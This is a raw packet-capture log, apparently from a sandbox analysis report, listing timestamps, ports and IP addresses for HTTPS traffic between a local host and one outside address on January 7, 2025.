Jan 7, 2025 04:22:07.043562889 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.043705940 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.043751001 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.043901920 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.043951035 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.043997049 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.044003963 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.044014931 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.044018030 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.044044018 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.044051886 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.044070959 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.044099092 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.044164896 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.044214964 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.044370890 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.044415951 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.044431925 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.044490099 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.044625044 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.044652939 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.044676065 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.044683933 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.044696093 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.044728041 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.044984102 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.045027971 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.045030117 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.045038939 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.045087099 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.045278072 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.045310974 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.045326948 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.045332909 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.045342922 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.045344114 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.045371056 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.045377016 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.045399904 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.045420885 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.045628071 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.045672894 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.045810938 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.045859098 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.122051954 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.122123957 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.123970032 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.124021053 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.125721931 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.125771999 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.129395962 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.129458904 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.131531954 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.131584883 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.135324001 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.135368109 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.136989117 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.137038946 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.138849020 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.138902903 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.143112898 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.143176079 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.144186974 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.144238949 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.147783995 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.147840023 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.149863005 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.149915934 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.153532028 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.153577089 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.155292988 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.155344009 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.157082081 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.157145023 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.157171011 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.160659075 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.160702944 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.163425922 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.163482904 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.166066885 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.166116953 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.167850018 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.167901039 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.169795990 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.169851065 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.173346043 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.173403978 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.175179005 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.175225019 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.179835081 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.179879904 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.180124044 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.180177927 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.182878017 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.182931900 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.184612989 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.184664965 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.186415911 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.186477900 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.190104008 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.190176010 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.191966057 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.192039967 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.195486069 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.195538044 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.197384119 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.197433949 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.199194908 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.199250937 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.213783979 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.213835001 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.213953018 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.213999987 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.216546059 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.216576099 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.216598988 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.216609001 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.216626883 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.216645002 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.221975088 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.222004890 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.222027063 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.222033978 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.222050905 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.222065926 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.228024960 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.228054047 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.228074074 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.228080988 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.228115082 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.228135109 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.233164072 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.233190060 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.233227968 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.233234882 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.233259916 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.233278990 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.238713980 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.238768101 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.242253065 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.242295980 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.242407084 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.242482901 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.247690916 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.247740984 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.247750998 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.247801065 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.253103018 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.253149986 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.253237963 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.253284931 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.258460999 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.258513927 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.258671999 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.258722067 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.264009953 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.264066935 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.264113903 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.264169931 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.267518044 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.267581940 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.267738104 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.267790079 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.272588968 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.272644043 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.272770882 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.272840023 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.277080059 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.277133942 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.277182102 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.277234077 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.277429104 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.282464981 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.282517910 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.282572031 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.282612085 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.287939072 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.287992954 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.288079023 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.288129091 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.320784092 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.345295906 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.345355988 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.350553989 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.350588083 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.350610971 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.350620031 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.350639105 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.350662947 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.352091074 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.352143049 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.357214928 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.357275009 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.358046055 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.358134985 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.361740112 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.361792088 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.363502026 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.363555908 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.365255117 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.365312099 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.368968964 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.369028091 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.370733023 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.370779037 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.374476910 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.374530077 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.376130104 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.376187086 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.378015041 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.378068924 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.381628036 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.381680965 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.383557081 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.383671999 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.386424065 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.386476040 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.388263941 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.388319016 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.391937017 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.391993046 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.393814087 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.393870115 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.395512104 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.395565987 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.399182081 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.399235964 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.401205063 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.401257992 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.404153109 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.404206038 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.404475927 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.404520988 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.405394077 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.405441999 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.407540083 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.407591105 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.408833027 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.408888102 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.410130978 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.410181999 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.411175966 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.411226988 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.412235022 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.412286043 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.414385080 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.414441109 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.437829018 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.437891960 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.438008070 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.438050985 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.440373898 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.440476894 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.440546989 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.440598965 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.445936918 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.445997000 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.446108103 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.446156025 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.452043056 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.452069998 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.452092886 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.452102900 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.452131033 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.452140093 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.456954002 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.457039118 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.457140923 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.457182884 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.462537050 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.462593079 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.462692022 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.462740898 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.467541933 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.467588902 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.467645884 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.467725039 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.471817017 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.471865892 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.471998930 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.472044945 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.477216005 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.477269888 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.477371931 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.477442980 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.482676029 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.482733011 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.482866049 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.482917070 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.488080978 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.488135099 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.488224983 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.488275051 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.491614103 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.491667986 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.491764069 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.491807938 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.495079041 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.495136023 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.495162010 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.495204926 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.498368025 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.498429060 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.498508930 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.498550892 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.501562119 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.501611948 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.501682043 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.501737118 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.504719019 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.504776001 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.504848957 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.504897118 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.530455112 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.530507088 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.530517101 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.530566931 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.532984018 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.533039093 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.533082962 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.533130884 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.538511038 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.538566113 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.538695097 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.538744926 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.544404030 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.544466972 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.544523954 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.544570923 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.549449921 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.549501896 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.549628019 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.549688101 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.555176020 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.555246115 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.555290937 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.555345058 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.560019016 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.560120106 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.560152054 CET	443	49740	39.103.20.48	192.168.2.4
